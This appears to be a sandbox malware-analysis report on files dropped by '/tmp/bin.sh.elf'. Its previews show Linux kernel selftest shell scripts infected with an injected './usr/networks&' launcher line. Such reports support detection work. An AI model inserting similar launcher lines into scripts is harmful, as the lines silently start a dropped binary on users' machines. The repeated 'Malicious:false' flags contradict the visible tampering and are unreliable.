                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1945
                                                                        Entropy (8bit):4.979286071491067
                                                                        Encrypted:false
                                                                        SSDEEP:48:RWm+vzox5sLz6EYxhP1zNhxhfB3c2wSLOy62xC:RZ+EN9BsYC
                                                                        MD5:48B0FCC1C0DC28CF6C49038349B2052A
                                                                        SHA1:EC84B8956F1DDC8FDE4340B54B1C372F8336BBBF
                                                                        SHA-256:3C68383030083C47A9841D41A6FE581CB5E302971838E773AAB6F7CF6676C763
                                                                        SHA-512:46BCE1A60F89D5A2227A63BD13E12E37A1AB5D98F80DCFE2990DADB34DA8AC6637B777E089E6E3DF703CD5FF45BAC39B0F28289D922CBF2958850D8BBB390388
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 1.}..if [ $# -eq 0 ];then..echo "No benchmark results file provided"..echo..usage.fi..while getopts o:t:p: name ; do. case $name in..o).. output_file="$OPTARG".$picture_type.. ;;..t).. global_title="$OPTARG".. ;;..p).. picture_type="$OPTARG".. ;;. ?).. usage.. ;;. esac.done.shift $(($OPTIND -1))..plots=0.while [ "$1" ];do. if [ ! -f "$1" ];then..echo "File $1 does not exist"..usage. fi. file[$plots]="$1". title[$plots]="$2". # echo "File: ${file[$plots]} - ${title[plots]}". shift;shift. plots=$((plots + 1)).done..echo "set terminal $picture_type".>> $dir/plot_script.gpl.echo "set output \"$output_file\"".>> $dir/plot_script.gpl.echo "set title \"$global_title\"".>> $dir/plot_script.gpl.echo "set xlabel \"sleep/load time\"".>> $dir/plot_script.gpl.echo "set ylabel \"Performance (%)\"".>> $dir/plot_script.gpl..for((plot=0;plot<$plots;plot++));do.. # Sanity check. ###### I am to dump to get this redir
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):604
                                                                        Entropy (8bit):5.561154174414677
                                                                        Encrypted:false
                                                                        SSDEEP:12:XrBIJk/GnbR1LN0EA055gVA05b8A05hfEA0uVLGOfj14n:7BIJk/wbREEN5ONANhfEScOfjy
                                                                        MD5:9D2CE9B921B8F8B5C1EBFE4286555C72
                                                                        SHA1:99A3182EA8A51A67CBC111A5B3A99AFE64912BBE
                                                                        SHA-256:8D91B2E3D2D4D960A1F9AD0520E75896F8BCA7D6FFED6BE756C04FC642713CF5
                                                                        SHA-512:BE5B1134C9487E143DD1D95FA58764EB1C9F072B9DB2950DC8B9D8B40CEABC071BE623FC43E5F9DABE61C2A181A8FE6B73AC7269CAE4A026BBC977F863CC428C
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..*$LF*) (exit 1) ;;..v[0-9]*)...git update-index -q --refresh...test -z "$(git diff-index --name-only HEAD --)" ||...VN="$VN-dirty" ;;..esac.then..VN=$(echo "$VN" | sed -e 's/-/./g');.else..eval $(grep '^VERSION[[:space:]]*=' ../../../Makefile|tr -d ' ')..eval $(grep '^PATCHLEVEL[[:space:]]*=' ../../../Makefile|tr -d ' ')..eval $(grep '^SUBLEVEL[[:space:]]*=' ../../../Makefile|tr -d ' ')..eval $(grep '^EXTRAVERSION[[:space:]]*=' ../../../Makefile|tr -d ' ')...VN="${VERSION}.${PATCHLEVEL}.${SUBLEVEL}${EXTRAVERSION}".fi..VN=$(expr "$VN" : v*'\(.*\)')..echo $VN../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3546
                                                                        Entropy (8bit):5.39875675800216
                                                                        Encrypted:false
                                                                        SSDEEP:48:+ompInFo6hycZe5pJcycfKkIfIJey5rmwxNlxtxgy/mLXFVxRx0F+xeJ3x0U2oxX:LmmVycfJ+6q2IyuTFQ1KU2AHVEm
                                                                        MD5:9175A020A49687C9C3769B4E3ECF52BB
                                                                        SHA1:744CC9432C843375F236C065D2CCA76275E70748
                                                                        SHA-256:B00FF74B7D297A53347F375E626532D14655592F175589276F394F15781715C3
                                                                        SHA-512:A30C2A72C46748F4052250093FCE5BC75817A75363DA4CB3E06ABAA4BA0C831151E65FD98F3F94168828719CC4D55625897ADCC3DEE571ED156AA459A066A916
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...Display a usage message and exit...--interval=value, --space=value, --verbose=value, --task-filter=value,..--stacktrace-depth=value, --require-start=value, --require-end=value,..--reject-start=value, --reject-end=value, --ignore-gfp-wait=value...See Documentation/fault-injection/fault-injection.rst for more...information...failslab options:..--cache-filter=value...fail_page_alloc options:..--ignore-gfp-highmem=value, --min-order=value..ENVIRONMENT..FAILCMD_TYPE...The following values for FAILCMD_TYPE are recognized:....failslab....inject slab allocation failures...fail_page_alloc....inject page allocation failures....If FAILCMD_TYPE is not defined, then failslab is used..EOF.}..if [ $UID != 0 ]; then..echo must be run as root >&2..exit 1.fi..DEBUGFS=`mount -t debugfs | head -1 | awk '{ print $3}'`..if [ ! -d "$DEBUGFS" ]; then..echo debugfs is not mounted >&2..exit 1.fi..FAILCMD_TYPE=${FAILCMD_TYPE:-failslab}.FAULTATTR=$DEBUGFS/$FAILCMD_TYPE..if [ ! -d $FAULTATTR ]; t
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):413
                                                                        Entropy (8bit):5.253172935744477
                                                                        Encrypted:false
                                                                        SSDEEP:12:cnNKNsMvtphZ+gAh2ph/3NGglqLENL9ZEvW5An:MW/h0gO6hfAGZPu
                                                                        MD5:C7FF2892487A4A9DCCB9497096C07366
                                                                        SHA1:742762D51E61ACEB34E44A410623DE39E5D7903C
                                                                        SHA-256:1F4CB9F291DBEF883CFA0238173E31B10F3571B2EFE1321A7B043DCB3AEE0A96
                                                                        SHA-512:60E00DC9040A73AE4FC833E344AC636F5B5CE3DA9CF8AE6E56A3099B635A55512B8546C2CF3CAB089FD192B2CD25A635CF2AB81B3B28F611C3D82F9434228595
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit $ksft_skip..fi.}..check_device().{..DEVICE=/dev/ion..if [ ! -e $DEVICE ]; then...echo $TCID: No $DEVICE device found >&2...echo $TCID: May be CONFIG_ION is not set >&2...exit $ksft_skip..fi.}..main_function().{..check_device..check_root...# ION_SYSTEM_HEAP TEST..run_test 0..# ION_SYSTEM_CONTIG_HEAP TEST..run_test 1.}..main_function.echo "$TCID: done".exit $errcode../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3539
                                                                        Entropy (8bit):5.262868278091748
                                                                        Encrypted:false
                                                                        SSDEEP:96:EFX2kIR7xG6YdQr8P1PPM5yGdtloNssUGoq2r+dPolt:EFXi7xG5Qr89M5yGdtKNjUGD2ydQ3
                                                                        MD5:9FA7F94959D499382EE4162EC6B3690E
                                                                        SHA1:586F5F28FD9A5FEEBF08777D43248855DCA5C281
                                                                        SHA-256:9324C4C6D57628AF310A26554D5A05D7DAFA44C9964C6785AE255E1C5DE7311A
                                                                        SHA-512:6B906A7B1FBB702B3BD470F970B7F5EF43DDD23D856C78F5CA61AFB804D0F843F492D87ED37C3DA974689F96FBDA2D12DEECA54EBB0044DF5F281369AF71F756
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.# If one build fails, continue but return non-0 on exit..return_value() {..if [ -d "$TMPDIR" ] ; then...rm -rf -- $TMPDIR..fi..exit $ERROR.}.trap return_value EXIT..case $1 in..-h|--help)...echo -e "$0 [-j <n>]"...echo -e "\tTest the different ways of building bpftool."...echo -e ""...echo -e "\tOptions:"...echo -e "\t\t-j <n>:\tPass -j flag to 'make'."...exit...;;.esac..J=$*..# Assume script is located under tools/testing/selftests/bpf/. We want to start.# build attempts from the top of kernel repository..SCRIPT_REL_PATH=$(realpath --relative-to=$PWD $0).SCRIPT_REL_DIR=$(dirname $SCRIPT_REL_PATH).KDIR_ROOT_DIR=$(realpath $PWD/$SCRIPT_REL_DIR/../../../../).cd $KDIR_ROOT_DIR..check() {..local dir=$(realpath $1)...echo -n "binary: "..# Returns non-null if file is found (and "false" is run)..find $dir -type f -executable -name bpftool -print -exec false {} + && \...ERROR=1 && printf "FAILURE: Did not find bpftool\n".}..make_and_clean() {..echo -e "\$PWD: $PWD"..echo -e
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3505
                                                                        Entropy (8bit):5.101999997737958
                                                                        Encrypted:false
                                                                        SSDEEP:96:Iismhd58plWbPrueNH0e5nJeHPeh1Juie5s1eHaeJuT1j9Tt2DT+d:Iibd58eDqknMiJIj0XmG
                                                                        MD5:84519E423ADA34395254E2A97E8275C2
                                                                        SHA1:6D30E47A2EE5CCAA28BA383E5694271CFE338409
                                                                        SHA-256:BAED396869873C4A7953F2C63FB78E30B2CBE68B33AA7C7AF2FC03FB9FBFB188
                                                                        SHA-512:C4878320B03141FF070B8239C2505981FD3216F27B0F51F4F1FE56C7DD8165830759C69C22CF4010582E91509884CE504AA8CA4180B65FF4A1322C44052F5EDA
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..# This test needs to be run in a network namespace with in_netns.sh. Check if.# this is the case and run it with in_netns.sh if it is being run in the root.# namespace..if [[ -z $(ip netns identify $$) ]]; then..../net/in_netns.sh "$0" "$@"..exit $?.fi..# Determine selftest success via shell exit code.exit_handler().{..if (( $? == 0 )); then...echo "selftests: $TESTNAME [PASS]";..else...echo "selftests: $TESTNAME [FAILED]";..fi...set +e...# Cleanup..tc filter del dev lo ingress pref 1337 2> /dev/null..tc qdisc del dev lo ingress 2> /dev/null.../flow_dissector_load -d 2> /dev/null..if [ $unmount -ne 0 ]; then...umount bpffs 2> /dev/null..fi.}..# Exit script immediately (well catched by trap handler) if any.# program/thing exits with a non-zero status..set -e..# (Use 'trap -l' to list meaning of numbers).trap exit_handler 0 2 3 6 9..# Mount BPF file system.if /bin/mount | grep /sys/fs/bpf > /dev/null; then..echo "bpffs already mounted".else..echo "bpf
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1010
                                                                        Entropy (8bit):5.220823243294136
                                                                        Encrypted:false
                                                                        SSDEEP:24:dpXvgl1FYPLVQt0KzCZbeO7zO7fNsiRVSddKXd3SVXaRZVM:dpYl1FMRQt9uZbeO7zO7fNsiRV6dKt3u
                                                                        MD5:1429FE66BCE5BDB1C1BD9D1D6C397EEB
                                                                        SHA1:20C1D8AFADA5DD4A3291ED54BFC11C8255F76993
                                                                        SHA-256:B01345A8859D778A3BDD2D189E3E4D8F1C918D5803B531F61CB25A962CBE2302
                                                                        SHA-512:99B2919EEB9BB93ADD1C00234F9185F17C6D5C480D276C0B2291DD7915AD242704F27DBFD8A76A24C2E5740F4C71BDE1DDD932CCD99796CBC071029C49EFD3A2
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..SRC_TREE=../../../../..test_run().{..sysctl -w net.core.bpf_jit_enable=$1 2>&1 > /dev/null..sysctl -w net.core.bpf_jit_harden=$2 2>&1 > /dev/null...echo "[ JIT enabled:$1 hardened:$2 ]"..dmesg -C..if [ -f ${SRC_TREE}/lib/test_bpf.ko ]; then...insmod ${SRC_TREE}/lib/test_bpf.ko 2> /dev/null...if [ $? -ne 0 ]; then....rc=1...fi..else...# Use modprobe dry run to check for missing test_bpf module...if ! /sbin/modprobe -q -n test_bpf; then....echo "test_bpf: [SKIP]"...elif /sbin/modprobe -q test_bpf; then....echo "test_bpf: ok"...else....echo "test_bpf: [FAIL]"....rc=1...fi..fi..rmmod test_bpf 2> /dev/null..dmesg | grep FAIL.}..test_save().{..JE=`sysctl -n net.core.bpf_jit_enable`..JH=`sysctl -n net.core.bpf_jit_harden`.}..test_restore().{..sysctl -w net.core.bpf_jit_enable=$JE 2>&1 > /dev/null..sysctl -w net.core.bpf_jit_harden=$JH 2>&1 > /dev/null.}..rc=0.test_save.test_run 0 0.test_run 1 0.test_run 1 1.test_run 1 2.test_restore.exit $rc../usr/network
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):815
                                                                        Entropy (8bit):5.201744181978782
                                                                        Encrypted:false
                                                                        SSDEEP:12:d1EHtVRnfZDWwV6O9EO7qHsv9KwaialTDsd6rVYrJREN2jjafDzt90dQfK4n:dMVbKs6AVqHsv9KrxlxrmTrjcD70dz4
                                                                        MD5:6CE0DE76BD02CEB0CCD7F9EFECFE12D2
                                                                        SHA1:CF040700C804B51EAF138D59014350AE29FA6F57
                                                                        SHA-256:B4507BFFC19C0CAE1C5E51ED4C1DF7199ECD1050CC0BC221E9F0C0C9FA97BC91
                                                                        SHA-512:88AF2876EE4E641CFA43BFC8F233110C106B01D99726AC45F1AB8DE9A51E34F3189695496C6E635AB7610E1AA1EC191B208A75A737BC4C3614F7FB8DF5C1255D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.# Determine selftest success via shell exit code.exit_handler().{..if [ $? -eq 0 ]; then...echo "selftests: $TESTNAME [PASS]";..else...echo "$TESTNAME: failed at file $LAST_LOADED" 1>&2...echo "selftests: $TESTNAME [FAILED]";..fi.}..libbpf_open_file().{..LAST_LOADED=$1..if [ -n "$VERBOSE" ]; then.. ./test_libbpf_open $1..else.. ./test_libbpf_open --quiet $1..fi.}..# Exit script immediately (well catched by trap handler) if any.# program/thing exits with a non-zero status..set -e..# (Use 'trap -l' to list meaning of numbers).trap exit_handler 0 2 3 6 9..libbpf_open_file test_l4lb.o..# Load a program with BPF-to-BPF calls.libbpf_open_file test_l4lb_noinline.o..# Load a program compiled without the "-target bpf" flag.libbpf_open_file test_xdp.o..# Success.exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):578
                                                                        Entropy (8bit):5.580525958294917
                                                                        Encrypted:false
                                                                        SSDEEP:12:9nt1L9fIymYVbR6XQlxeZ3qec7eZ30hc2GbxgWDaAJgxEd4n:ht1L9fp6ADeZ6HKZkq/bxjuAJgxEd4
                                                                        MD5:87F640BAAB0006615A81B86FEB324304
                                                                        SHA1:80D2E7ACB3CB4E4E3C96768D2D718B6A6E5C5EC7
                                                                        SHA-256:46F504EA4EC509A4B684D9EEB87FF9C1CEB2FE1AE9A28205FCA3F349E29FE30F
                                                                        SHA-512:A6AA809ADE6841AF63388319942C5A930DC80889850756D9590B61FDC564AB25128258D622B9849AC931CC9E817611C928811933E6163B7D57829D8BB5C0B976
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..GREEN='\033[0;92m'.RED='\033[0;31m'.NC='\033[0m' # No Color..modprobe rc-loopback..for i in /sys/class/rc/rc*.do..if grep -q DRV_NAME=rc-loopback $i/uevent..then...LIRCDEV=$(grep DEVNAME= $i/lirc*/uevent | sed sQDEVNAME=Q/dev/Q)...INPUTDEV=$(grep DEVNAME= $i/input*/event*/uevent | sed sQDEVNAME=Q/dev/Q)..fi.done..if [ -n $LIRCDEV ];.then..TYPE=lirc_mode2.../test_lirc_mode2_user $LIRCDEV $INPUTDEV..ret=$?..if [ $ret -ne 0 ]; then...echo -e ${RED}"FAIL: $TYPE"${NC}..else...echo -e ${GREEN}"PASS: $TYPE"${NC}..fi.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):12942
                                                                        Entropy (8bit):5.326261520608179
                                                                        Encrypted:false
                                                                        SSDEEP:384:DNIBI3p2eSvOMJOuTyL21J+wIm/13pI210:D6Kp2eWXT0wIq13pI210
                                                                        MD5:5663197F18E21DBEE3F75DB935185DAE
                                                                        SHA1:8E4143001A8E3656960C7FA11C7E2A2F1EB3DBFB
                                                                        SHA-256:96C78B0925035DA39102A42C3DDC2F0B16144C86508B06C3D143A639EFD62076
                                                                        SHA-512:D7021F9CFD085ECD1669E5A96F3FC3144126530ED4E746A3059FBEE3D7E3D250BE1F6DBFA34C8F3318A6FB0ADCBD533FD1A097A8792B063732FC9EB124FE7209
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..readonly NS1="ns1-$(mktemp -u XXXXXX)".readonly NS2="ns2-$(mktemp -u XXXXXX)".readonly NS3="ns3-$(mktemp -u XXXXXX)"..readonly IPv4_1="172.16.1.100".readonly IPv4_2="172.16.2.100".readonly IPv4_3="172.16.3.100".readonly IPv4_4="172.16.4.100".readonly IPv4_5="172.16.5.100".readonly IPv4_6="172.16.6.100".readonly IPv4_7="172.16.7.100".readonly IPv4_8="172.16.8.100".readonly IPv4_GRE="172.16.16.100"..readonly IPv4_SRC=$IPv4_1.readonly IPv4_DST=$IPv4_4..readonly IPv6_1="fb01::1".readonly IPv6_2="fb02::1".readonly IPv6_3="fb03::1".readonly IPv6_4="fb04::1".readonly IPv6_5="fb05::1".readonly IPv6_6="fb06::1".readonly IPv6_7="fb07::1".readonly IPv6_8="fb08::1".readonly IPv6_GRE="fb10::1"..readonly IPv6_SRC=$IPv6_1.readonly IPv6_DST=$IPv6_4..TEST_STATUS=0.TESTS_SUCCEEDED=0.TESTS_FAILED=0..TMPFILE=""..process_test_results().{..if [[ "${TEST_STATUS}" -eq 0 ]] ; then...echo "PASS"...TESTS_SUCCEEDED=$((TESTS_SUCCEEDED+1))..else...echo "FAIL"...TESTS_FAILED=$((TESTS_FAIL
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):4595
                                                                        Entropy (8bit):4.759233094756956
                                                                        Encrypted:false
                                                                        SSDEEP:48:9+dS8OIs4J6TSSGKvFUUWPO+UqUzxSdU8YpYjUjC7NfYjX8QD:cp7odrSC7WYjCqjX88
                                                                        MD5:B2FD1A65727D7D547BE1A5BF89A413C2
                                                                        SHA1:CBE271C6A674C5F722844876727B395103222C8B
                                                                        SHA-256:F293BC5B50C83CC9218D5247B196B75F08645850A020A8111B7AECFFF8920FAA
                                                                        SHA-512:D6B5F33DF09E6F60B02243AF2C9971EA59997D9B6004B753D23513A9DFD104CC13C5B792A64F21E99BC6F46158AADDA3B866643603E7CB6906B5E5C28C9C3A39
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..TMP_FILE="/tmp/selftest_lwt_seg6local.txt"..cleanup().{..if [ "$?" = "0" ]; then...echo "selftests: test_lwt_seg6local [PASS]";..else...echo "selftests: test_lwt_seg6local [FAILED]";..fi...set +e..ip netns del ns1 2> /dev/null..ip netns del ns2 2> /dev/null..ip netns del ns3 2> /dev/null..ip netns del ns4 2> /dev/null..ip netns del ns5 2> /dev/null..ip netns del ns6 2> /dev/null..rm -f $TMP_FILE.}..set -e..ip netns add ns1.ip netns add ns2.ip netns add ns3.ip netns add ns4.ip netns add ns5.ip netns add ns6..trap cleanup 0 2 3 6 9..ip link add veth1 type veth peer name veth2.ip link add veth3 type veth peer name veth4.ip link add veth5 type veth peer name veth6.ip link add veth7 type veth peer name veth8.ip link add veth9 type veth peer name veth10..ip link set veth1 netns ns1.ip link set veth2 netns ns2.ip link set veth3 netns ns2.ip link set veth4 netns ns3.ip link set veth5 netns ns3.ip link set veth6 netns ns4.ip link set veth7 netns ns4.ip link
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:C source, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):983
                                                                        Entropy (8bit):5.4677073569376216
                                                                        Encrypted:false
                                                                        SSDEEP:24:L/uELj8SFuFhN/n/kJg6xsK4jkZFpsrpy4Z8I4NJmwYSJtyEE:L//L3Zx94CcbrEnYSc
                                                                        MD5:564EF28E81C3F1C042AC5F894B0C0E8E
                                                                        SHA1:C7C5DF90F4489C94C16489EBC74E5EA0FD01A3FB
                                                                        SHA-256:D4C71542C8F8F69453D200E625BD7C36F4BC84CE38E9A95A5462D1FED58A9EE3
                                                                        SHA-512:57DC61E2FA2786747BA13B4E6BCB73BEF8EE72FF894D766AFCA44711FF30E85D1A92805E504450197BD94ED5672F1835C883D04765BAEF37D77A9166E5339B5A
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.}..setup().{..# Create testing interfaces not to interfere with current environment...ip link add dev ${TEST_IF} type veth peer name ${TEST_IF_PEER}..ip link set ${TEST_IF} up..ip link set ${TEST_IF_PEER} up...wait_for_ip...tc qdisc add dev ${TEST_IF} clsact..tc filter add dev ${TEST_IF} egress bpf obj ${BPF_PROG_OBJ} \...sec ${BPF_PROG_SECTION} da...BPF_PROG_ID=$(tc filter show dev ${TEST_IF} egress | \....awk '/ id / {sub(/.* id /, "", $0); print($1)}').}..cleanup().{..ip link del ${TEST_IF} 2>/dev/null || :..ip link del ${TEST_IF_PEER} 2>/dev/null || :.}..main().{..trap cleanup EXIT 2 3 6 15..setup..${PROG} ${TEST_IF} ${BPF_PROG_ID}.}..DIR=$(dirname $0).TEST_IF="test_cgid_1".TEST_IF_PEER="test_cgid_2".MAX_PING_TRIES=5.BPF_PROG_OBJ="${DIR}/test_skb_cgroup_id_kern.o".BPF_PROG_SECTION="cgroup_id_logger".BPF_PROG_ID=0.PROG="${DIR}/test_skb_cgroup_id_user".type ping6 >/dev/null 2>&1 && PING6="ping6" || PING6="ping -6"..main../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:C source, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):684
                                                                        Entropy (8bit):5.360388977189686
                                                                        Encrypted:false
                                                                        SSDEEP:12:wW/+j9boHrFB8JHQFbqOQFJP4av9bfB44v9bvHJpbg9JpJyizdQuvM9Xs0T+CvGt:L/uELj8SFuFF4EDB4+7ppsrpy4MXsfLh
                                                                        MD5:42E3B4F746976F0CAC55AEF91D587353
                                                                        SHA1:6B8C6DE3531ADA0A3CB20D073D546C36534E0B6A
                                                                        SHA-256:BC8663FC965F917432E546D66EA1078E76D8C4526EF4CCC78FC72111FC71A5EF
                                                                        SHA-512:F51402D79D2F18866294A0F0235A156F0C09976B20077EFF0BDB4B6E0BCB24A9B0CD1C94F15023C133AD8B7D70B60C2740498920272818440A12A413C08427E0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.}..setup().{..# Create testing interfaces not to interfere with current environment...ip link add dev ${TEST_IF} type veth peer name ${TEST_IF_PEER}..ip link set ${TEST_IF} up..ip link set ${TEST_IF_PEER} up...ip -4 addr add ${TEST_IPv4} dev ${TEST_IF}..ip -6 addr add ${TEST_IPv6} dev ${TEST_IF}..wait_for_ip.}..cleanup().{..ip link del ${TEST_IF} 2>/dev/null || :..ip link del ${TEST_IF_PEER} 2>/dev/null || :.}..main().{..trap cleanup EXIT 2 3 6 15..setup.../test_sock_addr setup_done.}..BASENAME=$(basename $0 .sh).TEST_IF="${BASENAME}1".TEST_IF_PEER="${BASENAME}2".TEST_IPv4="127.0.0.4/8".TEST_IPv6="::6/128".MAX_PING_TRIES=5..main../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2541
                                                                        Entropy (8bit):5.348844603657122
                                                                        Encrypted:false
                                                                        SSDEEP:48:rVmWClCN3NSauOhnkBxyCKj7XtLI6HOeSB+7:nQi9Sa7dWEj7XlI6H/wy
                                                                        MD5:486AB5DADB683D5FDFC6BE511C3D830D
                                                                        SHA1:4E2A9023191D7C10655D50C068640D9B14993093
                                                                        SHA-256:5350A91A41B37C4FF9DCE4348A4FDB6C10BCE729B1091C697B053942383CAC39
                                                                        SHA-512:5980A62AB39F9CE5AEE3353E4D55C5D3F45DA7EA3DDC82820C3E3F04ECE63A41420705B53D37DEE1F6E952BB119C0AB735A674E28BE9B229847B66BDD04BB32F
                                                                        Malicious:false
